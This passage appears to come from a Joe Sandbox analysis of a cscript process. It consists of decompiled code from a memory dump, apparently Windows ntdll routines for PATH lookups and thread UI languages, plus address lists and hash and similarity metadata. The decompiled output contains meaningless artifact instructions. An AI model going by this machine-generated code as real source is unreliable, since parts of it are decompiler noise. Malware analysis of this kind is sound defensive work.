													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x55a6e58 & 0x0000ffff = E054FF3E0(__edi,  *0x55a6e5c,  *0x55a6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x55a6e58 & 0x0000ffff;
													__eax = ( *0x55a6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t293 = _v16;
													_t309 = _v32;
													L29:
													_t284 = _t284 + 4;
													__eflags = _t284;
													_v56 = _t284;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t293 = _t293 + 1;
									_v16 = _t293;
									__eflags = _t293 - _v48;
								} while (_t293 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t320 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M054E2935))) {
							case 0:
								__ax =  *0x55a8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E054E2E3E(0,  &_v64);
								_t280 = _t280 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x55a8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x55a8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E054CEEF0(0x55a79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E054CEB70(__ecx, 0x55a79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t328;
												if(_t328 < 0) {
													L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t289 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x55a7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E054CEB70(__ecx, 0x55a79a0);
										__eax = _v52;
										L36:
										_pop(_t321);
										_pop(_t329);
										__eflags = _v8 ^ _t338;
										_pop(_t281);
										return E054FB640(_t212, _t281, _v8 ^ _t338, _t309, _t321, _t329);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t276 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t278 = E054E2E3E(_t276,  &_v36);
									_t289 = _v36;
									_v76 = _t278;
								}
								if(_t289 == 0) {
									goto L44;
								} else {
									_t280 = _t280 + 2 + _t289;
								}
								goto L14;
							case 6:
								__eax =  *0x55a5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x55a8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x55a8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x55a6e58 & 0x0000ffff;
								__eax = ( *0x55a6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t320 = _t320 + 1;
								if(_t320 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t294 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("loopne 0x29");
					_t332 = _t327 + 1;
					 *((intOrPtr*)(_t332 + 5)) =  *((intOrPtr*)(_t332 + 5)) - _t294;
					_pop(_t285);
					_push(_t309);
					 *((intOrPtr*)(_t332 + 5)) =  *((intOrPtr*)(_t332 + 5)) - _t294;
					 *(_t237 + 0x2eefc54e ^ 0x0205525b) =  *(_t237 + 0x2eefc54e ^ 0x0205525b) - 0x4e;
					_push(ds);
					 *((intOrPtr*)(_t332 + 5)) =  *((intOrPtr*)(_t332 + 5)) - _t294;
					_t333 = _t332 - 1;
					 *((intOrPtr*)(_t333 + 5)) =  *((intOrPtr*)(_t333 + 5)) - _t294;
					asm("daa");
					_t335 = _t333;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x558ff00);
					E0550D08C(_t285, _t322, _t335);
					_v44 =  *[fs:0x18];
					_t323 = 0;
					 *_a24 = 0;
					_t286 = _a12;
					__eflags = _t286;
					if(_t286 == 0) {
						_t249 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t251 = 4;
						while(1) {
							_v40 = _t251;
							__eflags = _t251;
							if(_t251 == 0) {
								break;
							}
							_t299 = _t251 * 0xc;
							_v48 = _t299;
							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x5491664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t266 = E054FE5C0(_a8,  *((intOrPtr*)(_t299 + 0x5491668)), _t286);
									_t342 = _t342 + 0xc;
									__eflags = _t266;
									if(__eflags == 0) {
										_t336 = E055351BE(_t286,  *((intOrPtr*)(_v48 + 0x549166c)), _a16, _t323, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t251 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t251 = _t251 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t323;
									if( *_t295 == _t323) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t311 =  *((intOrPtr*)(_v44 + 0x30));
										_t253 =  *((intOrPtr*)(_t311 + 0x10));
										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t253 + 0x48)) == _t295) {
											__eflags =  *(_t311 + 0x1c);
											if( *(_t311 + 0x1c) == 0) {
												L106:
												_t336 = E054E2AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t323 = 1;
													_t295 = _v36;
													goto L75;
												}
											} else {
												_t256 = E054C6600( *(_t311 + 0x1c));
												__eflags = _t256;
												if(_t256 != 0) {
													goto L106;
												} else {
													_t295 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E054E2C50(_t295, _a8, _t286, _a16, _a20, _a24, _t323);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E054CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t263 = E054E2AE4( &_v36, _a8, _t286, _a16, _a20, _t336);
									_v32 = _t263;
									__eflags = _t263 - 0xc0000100;
									if(_t263 == 0xc0000100) {
										_v32 = E054E2C50(_v36, _a8, _t286, _a16, _a20, _t336, 1);
									}
									_v8 = _t323;
									E054E2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t249 = _t336;
					}
					L70:
					return E0550D0D1(_t249);
				}
				L108:
			}

0x054e2584
0x054e2586
0x054e2590
0x054e2596
0x054e2597
0x054e2598
0x054e2599
0x054e259e
0x054e25a4
0x054e25a9
0x054e25ac
0x054e25ae
0x054e25b1
0x054e25b2
0x054e25b5
0x054e25b8
0x054e25bb
0x054e25bc
0x054e25bf
0x054e25c2
0x054e25c5
0x054e25c6
0x054e25cb
0x054e25ce
0x054e25d8
0x054e25dd
0x054e25de
0x054e25e1
0x054e25e3
0x054e25e9
0x054e26da
0x054e26da
0x054e26dd
0x054e26e2
0x05525b56
0x00000000
0x054e26e8
0x054e26f9
0x054e26fb
0x054e26fe
0x054e2700
0x05525b60
0x00000000
0x054e2706
0x054e2706
0x054e270a
0x054e270a
0x054e270d
0x054e2713
0x054e2716
0x054e2718
0x054e271c
0x054e271e
0x05525b6c
0x05525b6f
0x05525b7f
0x05525b89
0x05525b8e
0x05525b93
0x05525b96
0x05525b9c
0x05525ba0
0x05525ba3
0x05525bab
0x05525bb0
0x05525bb3
0x05525bb3
0x05525ba3
0x054e2724
0x054e2726
0x054e2729
0x054e272c
0x054e279d
0x054e279d
0x054e27a0
0x054e27a2
0x00000000
0x054e272e
0x054e272e
0x054e2731
0x054e2734
0x054e2734
0x054e2736
0x05525bc1
0x05525bc1
0x05525bc4
0x00000000
0x05525bca
0x05525bca
0x05525bcd
0x00000000
0x05525bd3
0x00000000
0x05525bd3
0x05525bcd
0x054e273c
0x054e273c
0x054e2742
0x054e2747
0x054e274a
0x054e274d
0x054e2750
0x00000000
0x054e2756
0x054e2756
0x00000000
0x054e2902
0x054e2908
0x054e290b
0x00000000
0x054e2911
0x054e291c
0x054e2921
0x00000000
0x054e2921
0x00000000
0x00000000
0x054e2880
0x054e2887
0x054e288c
0x00000000
0x00000000
0x054e2805
0x054e280a
0x054e2814
0x054e2816
0x00000000
0x00000000
0x054e281e
0x054e2821
0x054e2823
0x00000000
0x054e2829
0x054e2829
0x054e2831
0x054e283c
0x054e283e
0x00000000
0x054e283e
0x00000000
0x00000000
0x054e284e
0x054e2850
0x054e2851
0x054e2854
0x054e2857
0x054e285a
0x054e285c
0x054e285d
0x00000000
0x00000000
0x054e275d
0x054e2761
0x00000000
0x054e2767
0x054e276e
0x054e2773
0x054e2773
0x054e2776
0x054e2778
0x054e277e
0x054e277e
0x054e2781
0x054e2781
0x054e2783
0x054e2784
0x00000000
0x00000000
0x05525bd8
0x05525bde
0x05525be4
0x05525be6
0x05525be8
0x05525be9
0x05525bee
0x05525bf8
0x05525bff
0x05525c01
0x05525c04
0x05525c07
0x05525c0b
0x05525c0d
0x05525c0d
0x05525c15
0x05525c18
0x05525c1b
0x05525c1b
0x05525c1e
0x00000000
0x00000000
0x054e28c3
0x054e28c8
0x054e28d2
0x054e28d4
0x054e28d8
0x054e28db
0x05525c26
0x05525c28
0x05525c2d
0x05525c2d
0x00000000
0x00000000
0x05525c34
0x05525c36
0x05525c49
0x05525c4e
0x05525c54
0x05525c5b
0x05525c5d
0x05525c60
0x054e2788
0x054e2788
0x054e278b
0x054e278e
0x054e278e
0x054e278e
0x054e2791
0x00000000
0x00000000
0x054e2756
0x054e2750
0x00000000
0x054e2794
0x054e2794
0x054e2795
0x054e2798
0x054e2798
0x00000000
0x054e2734
0x054e272c
0x054e2700
0x054e25ef
0x054e25ef
0x054e25ef
0x054e25f2
0x054e25f8
0x00000000
0x00000000
0x054e25fe
0x00000000
0x054e28e6
0x054e28ec
0x054e28ef
0x054e28f5
0x054e28f8
0x054e28f8
0x00000000
0x054e28f8
0x00000000
0x00000000
0x054e2866
0x054e2866
0x054e2876
0x054e2879
0x00000000
0x00000000
0x054e27e0
0x054e27e7
0x054e27e9
0x054e27eb
0x05525afd
0x00000000
0x05525afd
0x00000000
0x00000000
0x054e2633
0x054e2638
0x054e263b
0x054e263c
0x054e263e
0x054e2640
0x054e2642
0x054e2647
0x054e2649
0x054e264e
0x054e2650
0x054e2653
0x054e2659
0x054e26a2
0x054e26a7
0x054e26ac
0x054e26b2
0x05525b11
0x05525b15
0x05525b17
0x00000000
0x054e26b8
0x054e26b8
0x054e26ba
0x054e27a6
0x054e27a6
0x054e27a9
0x054e27ab
0x054e27b9
0x054e27b9
0x054e27be
0x054e27c1
0x054e27c3
0x054e27c5
0x054e27c7
0x05525c74
0x05525c79
0x05525c79
0x054e27c7
0x00000000
0x054e26c0
0x054e26c0
0x054e26c3
0x054e26c6
0x054e26c6
0x054e26c9
0x054e26c9
0x00000000
0x054e26c9
0x054e26ba
0x054e265b
0x054e265b
0x054e265e
0x054e2667
0x054e266d
0x054e2677
0x054e267c
0x054e267f
0x054e2681
0x05525b49
0x05525b4e
0x054e27cd
0x054e27d0
0x054e27d1
0x054e27d2
0x054e27d4
0x054e27dd
0x054e2687
0x054e2687
0x054e268a
0x054e268b
0x054e268e
0x054e268f
0x054e2691
0x054e2696
0x054e2698
0x054e269d
0x054e269f
0x00000000
0x054e269f
0x054e2681
0x00000000
0x00000000
0x054e2846
0x00000000
0x00000000
0x054e2605
0x054e260a
0x054e260c
0x054e2611
0x054e2616
0x054e2619
0x054e2619
0x054e261e
0x00000000
0x054e2624
0x054e2627
0x054e2627
0x00000000
0x00000000
0x05525b1f
0x00000000
0x00000000
0x054e2894
0x054e289b
0x054e289d
0x054e28a1
0x05525b2b
0x05525b2e
0x05525b2e
0x054e28a7
0x054e28a9
0x05525b04
0x05525b09
0x05525b09
0x05525b09
0x00000000
0x00000000
0x05525b35
0x05525b3c
0x054e28fb
0x054e28fb
0x054e26cc
0x054e26cc
0x054e26d0
0x00000000
0x054e26d2
0x054e26d2
0x00000000
0x054e26d2
0x00000000
0x00000000
0x054e25fe
0x054e292d
0x054e292f
0x054e2930
0x054e2935
0x054e293d
0x054e2945
0x054e2946
0x054e294e
0x054e294f
0x054e295a
0x054e295d
0x054e2965
0x054e2966
0x054e2969
0x054e296a
0x054e296e
0x054e2977
0x054e297d
0x054e297e
0x054e297f
0x054e2980
0x054e2981
0x054e2982
0x054e2983
0x054e2984
0x054e2985
0x054e2986
0x054e2987
0x054e2988
0x054e2989
0x054e298a
0x054e298b
0x054e298c
0x054e298d
0x054e298e
0x054e298f
0x054e2990
0x054e2992
0x054e2997
0x054e29a3
0x054e29a6
0x054e29ab
0x054e29ad
0x054e29b0
0x054e29b2
0x05525c80
0x054e29b8
0x054e29b8
0x054e29bb
0x054e29c0
0x054e29c5
0x054e29c6
0x054e29c6
0x054e29c9
0x054e29cb
0x00000000
0x00000000
0x054e29cd
0x054e29d0
0x054e29d9
0x054e29db
0x054e29dd
0x054e2a7f
0x054e2a84
0x054e2a87
0x054e2a89
0x05525ca1
0x05525ca3
0x00000000
0x054e2a8f
0x054e2a8f
0x00000000
0x054e2a8f
0x00000000
0x054e29e3
0x054e29e3
0x054e29e3
0x00000000
0x054e29e3
0x054e29dd
0x00000000
0x054e29db
0x054e29e6
0x054e29e9
0x054e29eb
0x054e29ed
0x054e29f3
0x054e29f5
0x054e29f8
0x054e29fa
0x054e2a97
0x054e2a9a
0x054e2a9d
0x054e2add
0x00000000
0x054e2a9f
0x054e2aa2
0x054e2aa5
0x054e2aa8
0x054e2aab
0x05525cab
0x05525caf
0x05525cc5
0x05525cda
0x05525cdc
0x05525cdf
0x05525ce5
0x00000000
0x05525ceb
0x05525ced
0x05525cee
0x00000000
0x05525cee
0x05525cb1
0x05525cb4
0x05525cb9
0x05525cbb
0x00000000
0x05525cbd
0x05525cbd
0x00000000
0x05525cbd
0x05525cbb
0x054e2ab1
0x054e2ab1
0x054e2ac4
0x054e2ac6
0x054e2ac6
0x00000000
0x054e2ac6
0x054e2aab
0x00000000
0x054e2a00
0x054e2a09
0x054e2a0e
0x054e2a21
0x054e2a24
0x054e2a35
0x054e2a3a
0x054e2a3d
0x054e2a42
0x054e2a59
0x054e2a59
0x054e2a5c
0x054e2a5f
0x054e2a5f
0x054e29fa
0x054e29f3
0x054e2a64
0x054e2a64
0x054e2a6b
0x054e2a6b
0x054e2a6d
0x054e2a72
0x054e2a72
0x00000000

Strings

PATH, xrefs: 054E2642, 054E2691

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 466f00aa3b504d0fe232cf2939827d767880b2fb3e5803d194e3bdd2604525a3
Instruction ID: 3e8bc00be62f41f322bc21689f538101590e18e669c3b3aed7271c61dba08544
Opcode Fuzzy Hash: 466f00aa3b504d0fe232cf2939827d767880b2fb3e5803d194e3bdd2604525a3
Instruction Fuzzy Hash: 98C1B175E082199FCB15DFA9D881BFEBBB9FF49701F04406AE401AB350E774A846CB60

Uniqueness

Uniqueness Score: -1.00%

Function 054EFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E054EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E054CEEF0(0x55a7b60);
					_t134 =  *0x55a7b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x55a7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x55a7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E054C6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E054C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E05558938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E054BB150();
													}
													_t116 = E05556D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E054C75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x55a8638; // 0x36c1c20
																	_t122 = L054C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E054C76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E054C76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L054EFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L054C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E054EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E054EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E054EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E054EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E054EFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x55a7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x55a7b84 = _t75;
						_t73 = E054CEB70(_t134, 0x55a7b60);
						if( *0x55a7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E054CFF60( *0x55a7b20);
							}
						}
						goto L5;
					}
				}
			}

0x054efab0
0x054efab2
0x054efab3
0x054efab4
0x054efabc
0x054efac0
0x054efb14
0x054efb17
0x054efac2
0x054efac8
0x054efacd
0x054efad3
0x054efad3
0x054efadd
0x054efb18
0x054efb1b
0x054efb1d
0x054efb1e
0x054efb1f
0x054efb20
0x054efb21
0x054efb22
0x054efb23
0x054efb24
0x054efb25
0x054efb26
0x054efb27
0x054efb28
0x054efb29
0x054efb2a
0x054efb2b
0x054efb2c
0x054efb2d
0x054efb2e
0x054efb2f
0x054efb3a
0x054efb3b
0x054efb3e
0x054efb41
0x054efb44
0x054efb47
0x054efb4a
0x054efb4d
0x054efb53
0x0552bdcb
0x0552bdcb
0x054efb59
0x054efb5b
0x054efb5b
0x054efb5e
0x0552bdd5
0x0552bdd8
0x00000000
0x0552bdda
0x00000000
0x0552bdda
0x054efb64
0x054efb64
0x054efb64
0x054efb67
0x054efb6e
0x054efb70
0x054efb72
0x00000000
0x054efb78
0x054efb7a
0x054efb7a
0x054efb7d
0x054efb80
0x0552bddf
0x0552bde1
0x00000000
0x0552bde3
0x00000000
0x0552bde3
0x054efb86
0x054efb86
0x054efb86
0x054efb8b
0x054efb90
0x054efb92
0x054efb94
0x054efb9a
0x054efb9b
0x054efba1
0x0552bde8
0x0552bdeb
0x0552bded
0x0552beb5
0x0552beb5
0x0552bebb
0x0552bebd
0x0552bec3
0x0552bed2
0x0552bedd
0x0552bedd
0x0552beed
0x00000000
0x0552bdf3
0x0552bdfe
0x0552be06
0x0552be0b
0x0552be0d
0x0552be0f
0x0552be14
0x0552be19
0x0552be20
0x0552be25
0x0552be27
0x0552be35
0x0552be39
0x0552be46
0x0552be4f
0x0552be54
0x0552be56
0x0552bef8
0x0552bef8
0x00000000
0x0552be5c
0x0552be5c
0x0552be60
0x00000000
0x0552be66
0x0552be66
0x0552be7f
0x0552be84
0x0552be87
0x0552be89
0x0552be8b
0x0552be99
0x0552be9d
0x0552bea0
0x0552beac
0x0552beaf
0x0552beb1
0x0552beb3
0x0552beb3
0x00000000
0x0552bea2
0x0552bea2
0x00000000
0x0552bea2
0x0552be8d
0x0552be8d
0x0552be92
0x00000000
0x0552be92
0x0552be8b
0x0552be60
0x0552be3b
0x0552be3b
0x0552be3e
0x00000000
0x0552be40
0x0552be40
0x0552be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0552be44
0x0552be3e
0x0552be29
0x0552be29
0x00000000
0x0552be29
0x0552be27
0x00000000
0x054efba7
0x054efba7
0x054efbab
0x0552bf02
0x054efbb1
0x054efbb1
0x054efbb8
